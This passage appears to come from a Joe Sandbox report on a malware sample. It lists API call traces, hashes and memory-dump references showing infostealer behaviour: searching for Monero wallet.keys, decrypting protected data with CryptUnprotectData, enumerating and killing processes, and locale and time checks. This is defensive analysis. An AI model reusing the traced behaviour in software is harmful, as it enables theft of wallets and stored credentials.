                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 1p~g$2F?o$NN?Q$V:{$Yt$Z37O$Z37O$dqy$f%($S{u
                            • API String ID: 0-548501366
                            • Opcode ID: 81c038ee9d1eab1ed35ae341833321ea2a56bbe9d66787b3bfc0531f4ebd53ec
                            • Instruction ID: c4b8c8462430600cbdddc2b847c2c7ecc4b01f460728417371e29eff7e8cf3cb
                            • Opcode Fuzzy Hash: 81c038ee9d1eab1ed35ae341833321ea2a56bbe9d66787b3bfc0531f4ebd53ec
                            • Instruction Fuzzy Hash: 81B228F360C2149FE3046E2DEC8567AFBE9EFD4220F1A4A3DE6C4C7744EA3558058696
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F515A8,00F50BAF), ref: 00F3DBEB
                            • StrCmpCA.SHLWAPI(?,00F515AC), ref: 00F3DC33
                            • StrCmpCA.SHLWAPI(?,00F515B0), ref: 00F3DC49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3DECC
                            • FindClose.KERNEL32(000000FF), ref: 00F3DEDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: a98dfb98ab42edaca4005c6fcbcecb3a4fc8f7be0c16610306f9784704575904
                            • Instruction ID: 8012fc97db512c00970181a55e5fbe3e6780923b6b68d9300ee0ded031d11a23
                            • Opcode Fuzzy Hash: a98dfb98ab42edaca4005c6fcbcecb3a4fc8f7be0c16610306f9784704575904
                            • Instruction Fuzzy Hash: 16915472A001189BDB14FB70ED969ED773DAF84340F004658FD0796185EF38AB48DB92
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F49905
                            • Process32First.KERNEL32(00F39FDE,00000128), ref: 00F49919
                            • Process32Next.KERNEL32(00F39FDE,00000128), ref: 00F4992E
                            • StrCmpCA.SHLWAPI(?,00F39FDE), ref: 00F49943
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4995C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F4997A
                            • CloseHandle.KERNEL32(00000000), ref: 00F49987
                            • CloseHandle.KERNEL32(00F39FDE), ref: 00F49993
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: a0dff7c72d8d8b178d0c8e7bb0ee3eaa24ff8f2512de7005124b531bb718671b
                            • Instruction ID: 1f3300054377833fad18193cfec48820efc9b78d69490b7b7103baef2ffec2f7
                            • Opcode Fuzzy Hash: a0dff7c72d8d8b178d0c8e7bb0ee3eaa24ff8f2512de7005124b531bb718671b
                            • Instruction Fuzzy Hash: 9D111F75A10208AFDB25DFA0EC8CBDEBB79AB48700F00468CF545A6284D774AA84CF90
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • GetKeyboardLayoutList.USER32(00000000,00000000,00F505B7), ref: 00F47D71
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00F47D89
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00F47D9D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F47DF2
                            • LocalFree.KERNEL32(00000000), ref: 00F47EB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: a2dd3ae77c6a03363d3e0c3d5e456b48fd34a5c52cbb03328f83add820b8b7f1
                            • Instruction ID: 9c22d1ea827572ce93f3182adbfa710f2ce681cefcf5a88815be8fa8322e0ed3
                            • Opcode Fuzzy Hash: a2dd3ae77c6a03363d3e0c3d5e456b48fd34a5c52cbb03328f83add820b8b7f1
                            • Instruction Fuzzy Hash: AF414F71940218AFDB24EB94DC99BEEBB74FF44700F1042D9E90A62281DB746F85DFA1
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F50D79), ref: 00F3E5A2
                            • StrCmpCA.SHLWAPI(?,00F515F0), ref: 00F3E5F2
                            • StrCmpCA.SHLWAPI(?,00F515F4), ref: 00F3E608
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3ECDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: bb3a018e09b00c077438fe8cf50b300f7332c7671eb8e9e16653aab059f15514
                            • Instruction ID: 9466951bf86bdd96b1b7540204b8441fc150cc55ebf33ec021da48b0b7a65529
                            • Opcode Fuzzy Hash: bb3a018e09b00c077438fe8cf50b300f7332c7671eb8e9e16653aab059f15514
                            • Instruction Fuzzy Hash: 88125572A501189BEB15FB70DDA6EED7739AF94300F4045E8B90A52091EF38AF48DF52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 3o?$"ru$NWo$_<[_$_EK;$JWW
                            • API String ID: 0-551700085
                            • Opcode ID: d6d58541d518787a1490662c8be51b81dc5d4b3b2c599c90275a0fd678a88ad5
                            • Instruction ID: fbdbbd979d4149e461a8be7e0821421e7e1ebc61e52a25b51d8197fb83fd9a91
                            • Opcode Fuzzy Hash: d6d58541d518787a1490662c8be51b81dc5d4b3b2c599c90275a0fd678a88ad5
                            • Instruction Fuzzy Hash: CFB23AF360C2049FE304AE2DEC8567ABBE9EF94720F16493DEAC4C7744E93598058796
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: \u$\u${${$}$}
                            • API String ID: 0-582841131
                            • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction ID: 9707a2b60a9284333bb02505a8b6c979a331080ba39de32335b2564e86545315
                            • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction Fuzzy Hash: 11418013E19BC9C5CB058B7444A02AEBFB22FD6220F6D42AAC4DD5F382C774454AD3A5
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F3C971
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F3C97C
                            • lstrcat.KERNEL32(?,00F50B47), ref: 00F3CA43
                            • lstrcat.KERNEL32(?,00F50B4B), ref: 00F3CA57
                            • lstrcat.KERNEL32(?,00F50B4E), ref: 00F3CA78
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: f6954175b806ac704725d0b14d6d9797187b12af1a8ede8a7e4ca68cdfbbb7f9
                            • Instruction ID: f54ea5425cc04290c9b68858d955a477af19f503392edae1898d42dbcaa3c6a5
                            • Opcode Fuzzy Hash: f6954175b806ac704725d0b14d6d9797187b12af1a8ede8a7e4ca68cdfbbb7f9
                            • Instruction Fuzzy Hash: FE417175D0420EDFDB20CFA0DD89BEEB7B8AB44304F1042A8E509A7280D7746A84DF91
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00F46C0C
                            • sscanf.NTDLL ref: 00F46C39
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F46C52
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F46C60
                            • ExitProcess.KERNEL32 ref: 00F46C7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: f4921fd8000a1738e27dfe3be5b7fe178f733f8a0328c6e79db67ebe3f6104d7
                            • Instruction ID: 6dd2356e3f59d5144dddf984bf6e630f812d318634f6161290109adc45157495
                            • Opcode Fuzzy Hash: f4921fd8000a1738e27dfe3be5b7fe178f733f8a0328c6e79db67ebe3f6104d7
                            • Instruction Fuzzy Hash: 5121ED75D00208AFCF15DFE4E8499EEB7B5FF48301F048529E506E3254EB34A604CB65
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F372AD
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F372B4
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F372E1
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00F37304
                            • LocalFree.KERNEL32(?), ref: 00F3730E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: ee959634a6dbc4706a72e7738de51c00a1f84d10d15c6cbfe2701c4926ad95e9
                            • Instruction ID: 23bafc7a53f9c20e61602a924fe33d497640df6d56fda6e9fc5a9de50ea671bb
                            • Opcode Fuzzy Hash: ee959634a6dbc4706a72e7738de51c00a1f84d10d15c6cbfe2701c4926ad95e9
                            • Instruction Fuzzy Hash: 600112B5A44308BFDB20DFE4DC4AF9D7778AB44B00F104544FB45AB2C5DA70BA009B64
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F497AE
                            • Process32First.KERNEL32(00F50ACE,00000128), ref: 00F497C2
                            • Process32Next.KERNEL32(00F50ACE,00000128), ref: 00F497D7
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 00F497EC
                            • CloseHandle.KERNEL32(00F50ACE), ref: 00F4980A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
